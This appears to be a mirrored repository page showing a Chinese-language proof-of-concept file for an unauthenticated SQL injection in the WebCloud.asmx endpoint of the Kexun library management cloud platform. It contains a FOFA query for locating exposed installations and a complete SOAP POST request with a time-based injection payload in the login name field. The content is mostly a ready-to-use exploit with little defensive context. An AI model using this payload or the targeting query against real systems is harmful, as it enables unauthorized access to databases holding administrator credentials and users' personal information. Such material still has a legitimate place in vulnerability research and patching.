admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 02:15:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/科讯图书馆综合管理云平台/科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

32 lines
1.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入
科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息例如管理员后台密码、站点的用户个人信息之外甚至在高权限的情况可向服务器中写入木马进一步获取服务器系统权限。
## fofa
```
body="科迅软件 版权所有"
```
## poc
```
POST /WebCloud.asmx HTTP/1.1
Host:
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "WebCloud/LibraryCloud"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<LibraryCloud xmlns="WebCloud">
<str>{"cmd":"login","schoolloginname":"1';WAITFOR DELAY '0:0:5'--","schoolpwd":"1"}</str>
<files>base64Binary</files>
</LibraryCloud>
</soap:Body>
</soap:Envelope>
```
Reference in New Issue View Git Blame Copy Permalink